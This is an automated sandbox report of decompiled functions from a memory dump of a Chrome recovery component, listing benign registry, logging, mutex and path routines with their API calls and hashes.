0x00c7379d
0x00c737aa
0x00c737b6
0x00c737bb
0x00c737bb
0x00c737eb

APIs

Part of subcall function 00C76CB8: wvsprintfW.USER32(00000000,00000000,00000001), ref: 00C76D50

OutputDebugStringW.KERNEL32 ref: 00C737AA

Strings

LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down , xrefs: 00C7379D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputStringwvsprintf
String ID: LOG_SYSTEM: [%s]: ERROR - Calling the logging system after it has been shut down
API String ID: 1118214310-1171486310
Opcode ID: dac9025e0f68c17758617bcf10e4df584fcdc424d141cb604154859101ff6228
Instruction ID: b7c54ef0456407fb9ccca008e2d352a710ceac7796a2453fafed2e0623cf651e
Opcode Fuzzy Hash: dac9025e0f68c17758617bcf10e4df584fcdc424d141cb604154859101ff6228
Instruction Fuzzy Hash: 5BF0F4B5604190AFCF089B25CA4A9E9F7ECEF56314710414AE40543291DBA2EE45A690

Uniqueness

Uniqueness Score: -1.00%

Function 00C7844C Relevance: 3.1, APIs: 2, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00C7844C(void* __ecx, WCHAR* _a4, void** _a8) {
				int _v8;
				int _v12;
				void* __ebp;
				signed short _t22;
				void* _t41;
				signed int _t42;
				void* _t45;
				signed short _t48;
				signed short _t53;

				_push(__ecx);
				_push(__ecx);
				_t45 = __ecx;
				_v8 = 0;
				_t5 = _t45 + 4; // 0xc77f74
				_v12 = 0;
				_t22 = SHQueryValueExW( *_t5, _a4, 0,  &_v12, 0,  &_v8); // executed
				_t48 = _t22;
				if(_t48 > 0) {
					_t48 = _t48 & 0x0000ffff | 0x80070000;
					_t53 = _t48;
				}
				if(_t53 == 0) {
					_t42 = 2;
					_push( ~(0 | _t53 > 0x00000000) | ((_v8 >> 0x00000001) + 0x00000001) * _t42);
					_t41 = E00C93DB5(_t53);
					 *_a8 = _t41;
					if(_t41 == 0) {
						_t48 = 0x8007000e;
					} else {
						if(_v8 == 0) {
							 *_t41 = 0;
						} else {
							_t19 = _t45 + 4; // 0xc77f74
							_t48 = SHQueryValueExW( *_t19, _a4, 0,  &_v12, _t41,  &_v8);
							if(_t48 > 0) {
								_t48 = _t48 & 0x0000ffff | 0x80070000;
							}
						}
					}
				}
				return _t48;
			}

0x00c7844f
0x00c78450
0x00c78453
0x00c78464
0x00c78467
0x00c7846a
0x00c7846d
0x00c78473
0x00c78477
0x00c7847c
0x00c78482
0x00c78482
0x00c78484
0x00c78490
0x00c7849a
0x00c784a1
0x00c784a6
0x00c784aa
0x00c784e1
0x00c784ac
0x00c784b0
0x00c784dc
0x00c784b2
0x00c784c0
0x00c784c9
0x00c784cd
0x00c784d2
0x00c784d2
0x00c784cd
0x00c784b0
0x00c784aa
0x00c784eb

APIs

SHQueryValueExW.SHLWAPI(00C77F74,?,00000000,?,00000000,00000000,00000000,00000000,00CA41C0,00CA41C0,?,00C7836E,IsEnrolledToDomain,?,00000000,00000000), ref: 00C7846D
SHQueryValueExW.SHLWAPI(00C77F74,?,00000000,?,00000000,00000000,?,00C7836E,IsEnrolledToDomain,?,00000000,00000000,?,HKLM\Software\Google\UpdateDev\,?,?), ref: 00C784C3

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8f790163209ffcc1d434826b56e06bfb0fa77a3f3705da10ed4f1fb39decbf67
Instruction ID: fc9e9e977b26ec2d9aaab0d45d0bda89d2af5b5170271f75a5e0b16d0c215e5b
Opcode Fuzzy Hash: 8f790163209ffcc1d434826b56e06bfb0fa77a3f3705da10ed4f1fb39decbf67
Instruction Fuzzy Hash: 7B11E977950116FFDB29CB54C919BAEB6BCEF04310F10816BBE05E7250D670DE04D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C8A69C Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C8A69C() {
				WCHAR* _t1;
				void* _t3;
				void* _t17;
				WCHAR* _t19;

				_t1 = GetEnvironmentStringsW();
				_t19 = _t1;
				if(_t19 != 0) {
					_t11 = E00C8A665(_t19) - _t19 & 0xfffffffe;
					_t3 = E00C89617(E00C8A665(_t19) - _t19 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E00C80C10(_t17, _t19, _t11);
					}
					E00C89541(0);
					FreeEnvironmentStringsW(_t19);
					return _t17;
				} else {
					return _t1;
				}
			}

0x00c8a69f
0x00c8a6a5
0x00c8a6a9
0x00c8a6b9
0x00c8a6bd
0x00c8a6c2
0x00c8a6c8
0x00c8a6cd
0x00c8a6d2
0x00c8a6d7
0x00c8a6de
0x00c8a6e9
0x00c8a6ac
0x00c8a6ac
0x00c8a6ac

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C8A69F
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00C842D2), ref: 00C8A6DE

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 69bea1aba9660ecb6ed2b2c518b1a71bf16bfeece0477a9edd449addb74a6139
Instruction ID: b6247006dea72c352e194e63940a25b761a595fa55754aa3baa847a38c84a1db
Opcode Fuzzy Hash: 69bea1aba9660ecb6ed2b2c518b1a71bf16bfeece0477a9edd449addb74a6139
Instruction Fuzzy Hash: 21E09B37209A212FA65132397C4EFAF1619DFC167DB290316F41546186FE114D0252AE

Uniqueness

Uniqueness Score: -1.00%

Function 00C7654E Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00C7654E(signed int __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _t9;

				if( *0xca8aac != 0xffffffff) {
					L7:
					_t9 =  *0xca8aac; // 0x0
					return _t9;
				} else {
					__imp__NetGetJoinInformation(0,  &_v12,  &_v8); // executed
					if(__eax == 0) {
						NetApiBufferFree(_v12);
						if(_v8 == 3) {
							_push(2);
						}
						asm("lock cmpxchg [edx], ecx");
						goto L7;
					} else {
						return __eax | 0xffffffff;
					}
				}
			}

0x00c7655a
0x00c7659d
0x00c7659d
0x00c765a3
0x00c7655c
0x00c76566
0x00c7656e
0x00c76578
0x00c76582
0x00c76584
0x00c76586
0x00c76599
0x00000000
0x00c76570
0x00c76574
0x00c76574
0x00c7656e

APIs

NetGetJoinInformation.NETAPI32(00000000,?,00C76733,?,?,?,00C76733,?,?,00000000), ref: 00C76566
NetApiBufferFree.NETAPI32(?,?,?,?,00C76733,?,?,00000000), ref: 00C76578

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: BufferFreeInformationJoin
String ID:
API String ID: 3807213042-0
Opcode ID: cd56ca72c848ff0f3eac0b21455b2cfb2d94c6dca156509bbf7bf878d2ecb2c4
Instruction ID: fa1a4a8383673126ac96a6fb35f3f1aa98deb62df9881206a82823e83955e662
Opcode Fuzzy Hash: cd56ca72c848ff0f3eac0b21455b2cfb2d94c6dca156509bbf7bf878d2ecb2c4
Instruction Fuzzy Hash: C2F0BE31921A09EFDB08CB68EC09B9DBB24AB01329F10836DF026925D0EB709E40EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C77A67 Relevance: 3.0, APIs: 2, Instructions: 23
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C77A67(struct _SECURITY_ATTRIBUTES* __edx) {
				intOrPtr* _t2;
				void* _t4;
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _t5;
				E00C77A14();
				_t2 =  *0xca9bbc;
				if(_t2 == 0) {
					return CreateMutexW(__edx, 0, _t7);
				}
				_t4 =  *_t2(__edx, _t7, 0, 0x100001); // executed
				return _t4;
			}

0x00c77a6c
0x00c77a6e
0x00c77a73
0x00c77a7a
0x00000000
0x00c77a8d
0x00c77a85
0x00000000

APIs

Part of subcall function 00C77A14: GetModuleHandleW.KERNEL32 ref: 00C77A37
Part of subcall function 00C77A14: GetProcAddress.KERNEL32 ref: 00C77A49
Part of subcall function 00C77A14: GetProcAddress.KERNEL32 ref: 00C77A5A

CreateMutexExW.KERNELBASE(?,?,00000000,00100001,?,00000000,?,00C7A032,00000000,?,?,?,00C7A653,?,00000000), ref: 00C77A85
CreateMutexW.KERNEL32(?,00000000,?), ref: 00C77A8D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressCreateMutexProc$HandleModule
String ID:
API String ID: 56544078-0
Opcode ID: 8e30ea518cc306570a6758b81c203673c2a49382670766377d3aa97bdf19735c
Instruction ID: bb9541b72305fc6410eae3665aa73766640f14caf2a3780eea9e772164ab9541
Opcode Fuzzy Hash: 8e30ea518cc306570a6758b81c203673c2a49382670766377d3aa97bdf19735c
Instruction Fuzzy Hash: 21D05E3131561176E635932BAC0AF9F5A6CDFC6BB1F24526AB109E21D0DA909A01A1B4

Uniqueness

Uniqueness Score: -1.00%

Function 00C74D7D Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00C74D7D(void* __ecx) {
				void* _t14;
				void* _t19;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						__imp__UnloadUserProfile( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(__ecx + 8)));
					}
					 *(_t19 + 8) =  *(_t19 + 8) & 0x00000000;
				}
				if( *(_t19 + 4) != 0) {
					FindCloseChangeNotification( *(_t19 + 4)); // executed
					 *(_t19 + 4) =  *(_t19 + 4) & 0x00000000;
				}
				_push(4);
				_t14 = E00C7F62D( *(_t19 + 0xc));
				 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
				return _t14;
			}

0x00c74d7e
0x00c74d84
0x00c74d8a
0x00c74d92
0x00c74d92
0x00c74d98
0x00c74d98
0x00c74da0
0x00c74da5
0x00c74dab
0x00c74dab
0x00c74daf
0x00c74db4
0x00c74db9
0x00c74dc0

APIs

UnloadUserProfile.USERENV(?,?,?,00C74D70,?,00C74EBA), ref: 00C74D92
FindCloseChangeNotification.KERNELBASE(?), ref: 00C74DA5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ChangeCloseFindNotificationProfileUnloadUser
String ID:
API String ID: 122385185-0
Opcode ID: 96bfc9af16389f63e6bc1e2dd4f1e4d4c6418ae6a0d055a0c7f75e31bd88ba69
Instruction ID: e4164f5769863b500b6228defe8edeffba1d5b9d48ea943f4c927d27027a1494
Opcode Fuzzy Hash: 96bfc9af16389f63e6bc1e2dd4f1e4d4c6418ae6a0d055a0c7f75e31bd88ba69
Instruction Fuzzy Hash: A6F0A532015B109FE73A5B14E90D796BBE0EB10B26F14C85EE5AE518B0C7B5A894DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A863 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00C7A863(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v108;
				char _v204;
				char _v300;
				char _v301;
				signed int _v308;
				char _v340;
				void* __ebp;
				signed int _t29;
				void* _t35;
				signed short _t37;
				intOrPtr _t57;
				intOrPtr* _t69;
				signed char _t71;
				signed short _t72;
				signed short _t73;
				signed int _t75;
				void* _t80;

				_t80 = __eflags;
				_t67 = __edx;
				_t29 =  *0xca8008; // 0x617e0cdd
				_v8 = _t29 ^ _t75;
				_v308 = _v308 & 0x00000000;
				_t69 = __ecx;
				E00C72870( &_v340);
				_push(0x12);
				E00C724B7(__ebx, __edx, __ecx, __esi, _t80,  &_v300, 0xca35c8, 1);
				_t50 = 1;
				_t71 = 3;
				_t35 = E00C728ED( &_v340, _t80,  &_v300, 0x10000000, _t71);
				_t81 = _t35;
				if(_t35 == 0) {
					L3:
					_v301 = 1;
					L4:
					if((_t50 & 0x00000004) != 0) {
						_t35 = E00C725A0(_t35,  &_v108);
					}
					if((_t50 & 0x00000002) != 0) {
						_t35 = E00C725A0(_t35,  &_v204);
					}
					E00C725A0(_t35,  &_v300);
					if(_v301 == 0) {
						_t37 = E00C72712(_t50,  &_v340, _t69, _t71);
						_t57 =  *_t69;
						_t72 = _t37;
						__eflags =  *((intOrPtr*)(_t57 - 4)) - 1;
						if( *((intOrPtr*)(_t57 - 4)) > 1) {
							_t37 = E00C71CAB(_t50, _t69, _t72,  *((intOrPtr*)(_t57 - 0xc)));
							_t57 =  *_t69;
						}
						__imp__SetNamedSecurityInfoW(_t57, 1, 0x80000004, 0, 0, _t72, 0); // executed
						_t73 = _t37;
						E00C748AE(_t69, 0xffffffff);
						__eflags = _t73;
						if(__eflags == 0) {
							_t73 = 0;
						} else {
							if(__eflags > 0) {
								_t73 = _t73 & 0x0000ffff | 0x80070000;
							}
						}
					} else {
						_t73 = 0x8004fffb;
					}
					E00C728B6( &_v340);
					return E00C7F35B(_v8 ^ _t75);
				}
				_push(0x220);
				_push(0x20);
				E00C724B7(1, _t67, _t69, _t71, _t81,  &_v204, 0xca35c8, 2);
				_t50 = _t71;
				_t35 = E00C728ED( &_v340, _t81,  &_v204, 0x10000000, _t71);
				_t82 = _t35;
				if(_t35 == 0) {
					goto L3;
				}
				_push(0x221);
				_push(0x20);
				E00C724B7(_t50, _t67, _t69, _t71, _t82,  &_v108, 0xca35c8, 2);
				_t50 = 7;
				_t35 = E00C728ED( &_v340, _t82,  &_v108, 0x20000, _t71);
				_v301 = 0;
				if(_t35 != 0) {
					goto L4;
				}
				goto L3;
			}

0x00c7a863
0x00c7a863
0x00c7a86c
0x00c7a873
0x00c7a876
0x00c7a880
0x00c7a888
0x00c7a88d
0x00c7a89d
0x00c7a8b3
0x00c7a8b6
0x00c7a8be
0x00c7a8c3
0x00c7a8c5
0x00c7a93f
0x00c7a93f
0x00c7a946
0x00c7a949
0x00c7a94e
0x00c7a94e
0x00c7a956
0x00c7a95e
0x00c7a95e
0x00c7a969
0x00c7a975
0x00c7a984
0x00c7a989
0x00c7a98b
0x00c7a98d
0x00c7a991
0x00c7a998
0x00c7a99d
0x00c7a99d
0x00c7a9ad
0x00c7a9b7
0x00c7a9b9
0x00c7a9be
0x00c7a9c0
0x00c7a9cf
0x00c7a9c2
0x00c7a9c2
0x00c7a9c7
0x00c7a9c7
0x00c7a9c2
0x00c7a977
0x00c7a977
0x00c7a977
0x00c7a9d7
0x00c7a9ec
0x00c7a9ec
0x00c7a8c7
0x00c7a8cc
0x00c7a8dc
0x00c7a8f0
0x00c7a8f9
0x00c7a8fe
0x00c7a900
0x00000000
0x00000000
0x00c7a902
0x00c7a907
0x00c7a914
0x00c7a927
0x00c7a92f
0x00c7a934
0x00c7a93d
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00C724B7: GetSidLengthRequired.ADVAPI32(00000012), ref: 00C72525
Part of subcall function 00C724B7: InitializeSid.ADVAPI32(?,00000000,00000012), ref: 00C72538
Part of subcall function 00C724B7: GetSidSubAuthority.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C7A8A2,?), ref: 00C72559

SetNamedSecurityInfoW.ADVAPI32(?,00000001,80000004,00000000,00000000,00000000,00000000,?,10000000,00000003,?,00000000,00000010,00000000), ref: 00C7A9AD

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AuthorityInfoInitializeLengthNamedRequiredSecurity
String ID:
API String ID: 1879106642-0
Opcode ID: aa31a98451ea5ca716952b7868065993c752703e2660c03107e48c8bce3620f6
Instruction ID: b1176ac5393f08311dedd55720619b27c63391adb560697a02678a5ab3fd30ef
Opcode Fuzzy Hash: aa31a98451ea5ca716952b7868065993c752703e2660c03107e48c8bce3620f6
Instruction Fuzzy Hash: 38412A32E00228AADB24E7A4CC9AFED7778EF44354F048095F60D6B1C1EA715F98DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B1E8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C7B1E8(signed int __ecx, WCHAR** __edx, void* __eflags, char _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR** _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t16;
				int _t21;
				void* _t41;
				char _t42;
				WCHAR* _t45;
				signed int _t48;
				WCHAR* _t50;
				void* _t52;

				_t52 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t24 = _a8;
				_push(_t41);
				_v12 = __edx;
				_t48 = __ecx;
				E00C71AD8( &_v8, __edx, E00C713D8());
				_t16 = E00C762F4(_a8, _t48 | 0x00004000,  &_v8, _t41, _t48 | 0x00004000, _t52); // executed
				_t50 = _v8;
				_t42 = _t16;
				if(_t42 >= 0) {
					_t45 =  *_v12;
					if((1 -  *((intOrPtr*)(_t50 - 4)) |  *((intOrPtr*)(_t50 - 8)) - 0x00000104) < 0) {
						E00C71BA8( &_v8, 0x104, 0x104);
						_t50 = _v8;
					}
					_t21 = PathAppendW(_t50, _t45);
					_t16 = E00C748AE( &_v8, 0xffffffff);
					if(_t21 != 0) {
						_t16 = E00C718D0(_t24, _t50);
						__eflags = _a4;
						if(__eflags != 0) {
							_t16 = E00C761DA(_t50, 0x104, __eflags);
						}
						_t42 = 0;
						__eflags = 0;
					} else {
						_t42 = 0x80040709;
					}
				}
				E00C713C0(_t16, _t50 - 0x10);
				return _t42;
			}

0x00c7b1e8
0x00c7b1eb
0x00c7b1ec
0x00c7b1ee
0x00c7b1f2
0x00c7b1f3
0x00c7b1f6
0x00c7b201
0x00c7b211
0x00c7b216
0x00c7b219
0x00c7b21d
0x00c7b234
0x00c7b236
0x00c7b23c
0x00c7b241
0x00c7b241
0x00c7b246
0x00c7b253
0x00c7b25a
0x00c7b266
0x00c7b26b
0x00c7b26f
0x00c7b273
0x00c7b273
0x00c7b278
0x00c7b278
0x00c7b25c
0x00c7b25c
0x00c7b25c
0x00c7b25a
0x00c7b27d
0x00c7b288

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

Part of subcall function 00C762F4: SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,00000000,0000001C,00CA8B40), ref: 00C76337

PathAppendW.SHLWAPI(?,?,00000000,00000000,?,00000000,0000001C,0000001C,?,00C7BA17,Google\Update,00000000,?,00000000,00000000,00000068), ref: 00C7B246

Part of subcall function 00C761DA: PathCanonicalizeW.SHLWAPI(?,?,00000000,00000000,?,00CA8B40,00CA8B40), ref: 00C76218

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Path$AppendCanonicalizeFolderHeapProcess
String ID:
API String ID: 419238146-0
Opcode ID: d596c76011273c9d4c57f1153080822bc2bfe1ef725eb000c663d8b4074a6b15
Instruction ID: 175e80c5c70b3faceea7061fa05e731e6b218b9d34d763ce01127ab503f164dc
Opcode Fuzzy Hash: d596c76011273c9d4c57f1153080822bc2bfe1ef725eb000c663d8b4074a6b15
Instruction Fuzzy Hash: 28110A76A00514A7CF19DB79C846A9EB7A5DFC4320F25816DF91AA3282DF70AF01D790

Uniqueness

Uniqueness Score: -1.00%

Function 00C78BEA Relevance: 1.5, APIs: 1, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00C78BEA(void* __ecx, void* __edi, void* __esi, int _a4, intOrPtr _a8, int* _a12) {
				signed int _v8;
				short _v32776;
				int _v32780;
				void* __ebp;
				signed int _t13;
				signed short _t18;
				intOrPtr _t32;
				signed short _t35;
				signed int _t38;
				signed short _t40;

				E00C93CD0();
				_t13 =  *0xca8008; // 0x617e0cdd
				_v8 = _t13 ^ _t38;
				_t32 = _a8;
				_v32780 = 0x4000;
				_t18 = RegEnumValueW( *(__ecx + 4), _a4,  &_v32776,  &_v32780, 0, _a12, 0, 0); // executed
				_t35 = _t18;
				if(_t35 == 0) {
					_push(E00C83694( &_v32776));
					L00C71A21(_t32, 0,  &_v32776);
					_t40 = _t35;
				}
				if(_t40 > 0) {
					_t35 = _t35 & 0x0000ffff | 0x80070000;
				}
				return E00C7F35B(_v8 ^ _t38);
			}

0x00c78bf2
0x00c78bf7
0x00c78bfe
0x00c78c08
0x00c78c15
0x00c78c2d
0x00c78c33
0x00c78c37
0x00c78c46
0x00c78c50
0x00c78c55
0x00c78c55
0x00c78c57
0x00c78c5c
0x00c78c5c
0x00c78c71

APIs

RegEnumValueW.KERNELBASE ref: 00C78C2D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: a664d893996abdcbf9697a965156dad4602eea35a4ac8043a8c2dcec0f8cf0b4
Instruction ID: 30df0a21c27f011fdc01405ac7295bf7bd10ec2e309e7e208f6db907ba8841ff
Opcode Fuzzy Hash: a664d893996abdcbf9697a965156dad4602eea35a4ac8043a8c2dcec0f8cf0b4
Instruction Fuzzy Hash: 04015676900128ABDB51DB58CC45AAF77BCFB84714F04C065B949D7240CE30DE489B94

Uniqueness

Uniqueness Score: -1.00%

Function 00C78C99 Relevance: 1.5, APIs: 1, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C78C99(void* __ecx, void* __edx, void* __edi, void* __esi, int _a4, intOrPtr _a8) {
				signed int _v8;
				short _v520;
				int _v524;
				void* __ebp;
				signed int _t11;
				signed short _t16;
				void* _t23;
				void* _t28;
				intOrPtr _t30;
				signed short _t32;
				signed int _t34;
				signed short _t36;

				_t28 = __edx;
				_t23 = __ecx;
				_t11 =  *0xca8008; // 0x617e0cdd
				_v8 = _t11 ^ _t34;
				_t30 = _a8;
				_v524 = 0x100;
				_t7 = _t23 + 4; // 0xc77f74, executed
				_t16 = RegEnumKeyExW( *_t7, _a4,  &_v520,  &_v524, 0, 0, 0, 0); // executed
				_t32 = _t16;
				if(_t32 == 0) {
					_push(E00C83694( &_v520));
					L00C71A21(_t30, _t28,  &_v520);
					_t36 = _t32;
				}
				if(_t36 > 0) {
					_t32 = _t32 & 0x0000ffff | 0x80070000;
				}
				return E00C7F35B(_v8 ^ _t34);
			}

0x00c78c99
0x00c78c99
0x00c78ca2
0x00c78ca9
0x00c78cae
0x00c78cbd
0x00c78cd2
0x00c78cd5
0x00c78cdb
0x00c78cdf
0x00c78cee
0x00c78cf8
0x00c78cfd
0x00c78cfd
0x00c78cff
0x00c78d04
0x00c78d04
0x00c78d19

APIs

RegEnumKeyExW.KERNELBASE(00C77F74,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C78CD5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 111493495d20d9bb8597f6bac716697d7329ad14050e2f10a23779c1b174ed03
Instruction ID: 52e46aa6ac599c29a2bd90a5339068df0320bed450d1a35598895e44a409153b
Opcode Fuzzy Hash: 111493495d20d9bb8597f6bac716697d7329ad14050e2f10a23779c1b174ed03
Instruction Fuzzy Hash: C201A7B6900228ABDB21EB54CC09EBFB7BCEF44310F008166FD59E7241DE30DE458AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7806C Relevance: 1.5, APIs: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C7806C(intOrPtr* __ecx, void* _a4, short* _a8, int _a12) {
				void* _v8;
				int _t11;
				signed short _t12;
				intOrPtr* _t21;
				signed int _t25;
				intOrPtr _t28;
				signed short _t33;

				_push(__ecx);
				_t11 = _a12;
				_v8 = _v8 & 0x00000000;
				_t21 = __ecx;
				_t25 = _t11 & 0x00000100;
				if(_t25 == 0) {
